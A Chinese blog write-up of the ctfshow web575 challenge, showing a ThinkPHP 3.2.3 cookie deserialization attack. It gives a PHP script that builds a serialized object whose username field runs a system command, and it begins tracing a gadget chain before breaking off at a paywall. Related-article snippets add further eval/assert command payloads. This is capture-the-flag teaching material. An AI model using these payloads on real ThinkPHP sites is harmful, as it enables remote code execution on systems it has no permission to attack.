ctfshow ThinkPHP篇575

最新推荐文章于 2025-02-24 20:37:02 发布
原创 最新推荐文章于 2025-02-24 20:37:02 发布 · 991 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细探讨了如何利用ThinkPHP3.2.3的反序列化漏洞进行代码执行,包括构造payload绕过条件,以及通过报错注入实现数据库操作,如执行SQL、写入文件。同时,提到了利用堆叠和多语句执行来提升权限,甚至可能构造恶意MySQL服务器进行远程控制。

web575

给了源码

$user= unserialize(base64_decode(cookie('user')));
if(!$user || $user->id!==$id){
   
   
	$user = M('Users');
	$user->find(intval($id));
	cookie('user',base64_encode(serialize($user->data())));
}
$this->show($user->username);
}

首先引起注意的是show()函数,前面提到这个函数可以执行php代码。所以我们只要能控制$user->username就可以了。
处于rce的目的的话不进if我们会方便很多。
我们可以直接构造一个类,给他的来个id变量和username变量
payload:

<?php
namespace Home\Controller{
   
   
class IndexController {
   
   
    public $id='1';   //get传入的id也要相同
    public $username='<?php system("cat /f*");?>';
}
}
namespace{
   
   
    use Home\Controller\IndexController;
    echo base64_encode(serialize(new IndexController()));
}
?>

bp抓包修改cookie
在这里插入图片描述
当然除了这个方法以外我们还知道thinkphp3.2.3存在反序列化漏洞。
正好复现一下这个漏洞。
全局搜索__destruct,我们要寻找存在这样可控参数调用方法的。
/ThinkPHP/Library/Think/Image/Driver/Imagick.class.php在这里插入图片描述
接着全局搜索function destroy(

ThinkPHP/Library/Think/Session/Driver/Memcache.class.php
在这里插入图片描述
全局搜索function delete(
/ThinkPHP/Library/Think/Model.class.php
我们看下我们在上一步传入的参数中$this->sessionName是可控的,但是后面拼接了个空字符,当我们给$this->sessionName赋值数组,接着拼接上空字符串就会出问题了。

<?php
$a=array(
最低0.47元/天 解锁文章
ctfshow ThinkPHP—3.2.3(569-578)
羽的博客
08-05 2669
文章目录web569相关内容题解web570web571web572web573web574web575web576web577web578 web569 相关内容 参考thinkphp手册 为了访问下图中的index方法并输出hello 123我们可以通过下面四种模式。 PATHINFO模式 http://localhost/index.php/Home/Index/index/name/123/ 普通模式 http://localhost/index.php?m=Home&c=Index&a
ctfshow thinkPHP专题
qq_45655564的博客
08-31 414
569-Thinkphp3.23的url访问规则 https://www.kancloud.cn/manual/thinkphp/1697 URL模式 入口文件是应用的单一入口,对应用的所有请求都定向到应用入口文件,系统会从URL参数中解析当前请求的模块、控制器和操作: http://serverName/index.php/模块/控制器/操作 这是3.2版本的标准URL格式。 可以通过设置模块绑定或者域名部署等方式简化URL地址中的模块及控制器名称。 所以 访问 url/index.php/Admin
ctfshow ThinkPHP专题 1
qq_61768489的博客
07-23 932
PATHINFO模式是系统的默认URL模式,提供了最好的SEO支持,系统内部已经做了环境的兼容处理,所以能够支持大多数的主机环境。REWRITE模式是在PATHINFO模式的基础上添加了重写规则的支持,可以去掉URL地址里面的入口文件index.php,但是需要额外配置WEB服务器的重写规则。m参数表示模块,c参数表示控制器,a参数表示操作(当然这些参数都是可以配置的),后面的表示其他GET参数。,ThinkPHP支持的URL模式有四种普通模式、PATHINFO、REWRITE和兼容模式。...
ctfshow ThinkPHP573
羽的博客
08-05 1180
web573 thinkphp 3.2.3sql注入漏洞 源代码 class IndexController extends Controller { public function index(){ $a=M('xxx'); //表名 $id=I('GET.id'); $b=$a->find($id); var_dump($b); } } 来调试一下看为什么普通的注入不行。本地sql表内数据如下。 传入?id=1' 首先在I函数里面有个过滤,调用
CTFshow——thinkphp专题
D.MIND 的博客
06-12 2003
570——闭包路由 关注这段代码:这是闭包路由的用法,官方:手册闭包支持 我们用phpinfo()函数测试一下:是可以的 /index.php/ctfshow/phpinfo/1 注意因为eval是一个语言结构而不是函数,所以这里是不能被call_user_func调用的,而assert是一个函数。因此我想到了assert(system("ls"));,但在尝试ls /时却不行了,很迷。 然后我想着参数转移一下。然后下意识构造出这样: /index.php/ctfshow/assert/$_POST[1
ctfshow-thinkphp
giaogiao123的博客
08-23 1164
基础知识 关于thinkphp需要知道的基本知识 https://www.kancloud.cn/manual/thinkphp/1696 demo1 修改 D:\phpStudy\PHPTutorial\WWW\thinkphp-3.2\thinkphp-3.2\Application\Home\Controller\IndexController.class.php <?php namespace Home\Controller; use Think\Controller; class Inde
CTFSHOW ThinkPHP
最新发布
2301_80038080的博客
02-24 438
ThinkPHP中,Pathinfo 是一种用于解析 URL 的模式,它允许通过路径参数来指定模块、控制器和方法。根据题目描述,flag 存在于 Admin 模块的 Login 控制器的 ctfshowLogin 方法中,因此需要通过 URL 访问该方法。在 ThinkPHP 的 Pathinfo 模式下,URL 的结构通常为:/index.php/模块/控制器/方法。
ctfshow thinkphp 3.2.3
blowed的博客
05-04 362
web569 相关内容 参考thinkphp手册 路由方式 http://serverName/index.php/模块/控制器/操作 此外就是默认是不区分大小写的,由'URL_CASE_INSENSITIVE' => true,这个配置决定。 URL模式的话,默认是PATHINFO模式,即本题考察的模式。 直接访问即可: /index.php/admin/login/ctfshowlogin web 570 根据题目提示 就直接看官方文档 路由一块 看到了闭包函数 .
ctfshow_ThinkPHP专题
qq_45951598的博客
07-02 528
web569-- 路由 打开页面是这样的 这里的话推荐想看一下3.2.3的开发手册,网站地址是ThinkPHP3.2.3完全开发手册 不想看的,我就简单的截取一张图片来看一下 PATHINFO模式下面的URL访问地址是: http://localhost/index.php/home/user/login/var/value/ 然后根据提示直接构造就是了 payload:http://1a941035-d87a-4eea-9068-77062fa67c57.challenge.ctf.show:80
【Web】Ctfshow Thinkphp3.2.3代码审计(4)
uuzeray的博客
12-28 1441
这里是从cookie里读user键对应的值进行反序列化,并将实例化对象与传入的id比较,如果id属性与传入的id相等,则show方法调用底层的eval执行实例化对象的username属性。因此,确保在进行反序列化之前,你需要确保序列化的类定义存在,并且能够被自动加载或手动引入。这里令$name=_content,$from=写的马即可让$_content非空,从而eval()执行php代码。这次where()里直接传了一个数组,省得走if将字符串的值再改为_string的数组了。
【Web】Ctfshow Thinkphp3.2.3代码审计(2)
uuzeray的博客
12-25 611
这段代码的作用是根据数据库字段类型的定义,对数据进行相应的类型转换,以确保数据的类型与数据库字段类型匹配,从而提高数据的准确性和一致性。比如数据库中的id是int型会进入intval函数,你输入1' union select * # 转换后就成了1。因为$options['where']是一个数组,所以会从if进入_parseType。其实很明显就是让$options['where']不为数组就可以了。所以要用一些路子,不进入到下面的if判断里。因为1是number,所以会让。这是我们不愿意看到的。
ctfshowThinkphp
灰太的表格的博客
08-24 349
web569 web570 /index.php/Home/ctfshow/assert/eval($_GET[1])/?1=system("tac%20/f*"); 闭包路由:参考官方文档或博客 web571 给了源码,找到一处可以进行传参的控制器,传个参数在这,打个断点调下: 接着跟进去: 接着跟进: 我们最开始传的参数在content变量里,跟进到if(这里有个对于当前使用的一个模板的判断,由于不知道题目使用的是哪种所以我就用0,1了图方便): 往下走: 成功找到后门,conten
ctfshow thinkphp专题
qq_50589021的博客
10-13 1040
前言 跟进一步增强php的代码审计能力,了解tp框架 从最基础的开始学习,目的不是为了一把梭,而是要明白它的原理和设计思路,为我们以后自主调试挖洞打下基础 web569——路由 本题使用的版本为3.2.3 ThinkPHP3.2.3完全开发手册-架构-URL模式 入口文件是应用的单一入口,对应用的所有请求都定向到应用入口文件,系统会从URL参数中解析当前请求的模块、控制器和操作: http://serverName/index.php/模块/控制器/操作 这是3.2版本的标准URL格式。 payload
CTF——Thinkphp5远程命令执行漏洞利用
qq_45521281的博客
05-03 8139
[BJDCTF 2nd]old-hack(5.0.23) 进入之后: 打开页面,页面提示powered by Thinkphp。说明可能和thinkphp框架有关。也确实如此,这里用到了thinkphp5的远程命令执行漏洞。 Thinkphp5远程命令执行漏洞 漏洞描述:由于thinkphp对框架中的核心Requests类的method方法提供了表单请求伪造,该功能利用 $_POST['_meth...
Ctfshow web入门 thinkphp专题
feng的博客
04-25 4629
web569 看一下thinkphp3.2.3官方手册,看完就都懂了: ThinkPHP3.2.3完全开发手册 首先就是路由的方式: http://serverName/index.php/模块/控制器/操作 此外就是默认是不区分大小写的,由'URL_CASE_INSENSITIVE' => true,这个配置决定。 URL模式的话,默认是PATHINFO模式,即本题考察的模式。 直接访问即可: /index.php/admin/login/ctfshowlogin web570 下载源码,在C
【Web】Ctfshow Thinkphp3.2.3代码审计(3)
uuzeray的博客
12-26 425
(这里我认为数据库id字段类型为varchar,这样数组条件判断进_parseType()就不会受到数字型或布尔型强制类型转化干扰)发现会进到is_string的判断里,让$options['where']=array("_string"=>"1")之后传入到find(),和web573一样也是以数组形式传参,只不过传入的参数也是数组,我们跟一下代码。键'_string'的首字符为'_',跟进parseThinkWhere()这题与web573的区别在于进find()前先进了where()处理。
【Web】Ctfshow Thinkphp3.2.3代码审计(1)
uuzeray的博客
11-26 527
ThinkPHP在开启DEBUG的情况下会在Runtime目录下生成日志,而且debug很多站都没关,其目录结构为 Application/Runtime/Logs/Home/年份_月份_日期.log。在fetch方法中执行了eval('?访问/Application/Runtime/Logs/Home/21_04_15.log。发现任意命令执行后门:/index.php?题目提示要爆破,而且不超过365次 (1年的天数)查看附件源码 (config.php)发现定义了一个可执行命令的路由规则。
【Web】Ctfshow Thinkphp5 非强制路由RCE漏洞
uuzeray的博客
12-29 1320
前面审了一些tp3的sql注入,终于到tp5了,要说tp5那最经典的还得是rce下面介绍非强制路由RCE漏洞。
ctfshow thinkphp
08-28
对于thinkphp的CTF演示,可以分享一些基本的信息和注意事项: 1. ThinkPHP是一款基于PHP语言开发的开源框架,被广泛应用于Web开发中。 2. 在CTF比赛中,可能会出现与ThinkPHP相关的题目,例如利用ThinkPHP的漏洞...
评论 2
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

yu22x

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值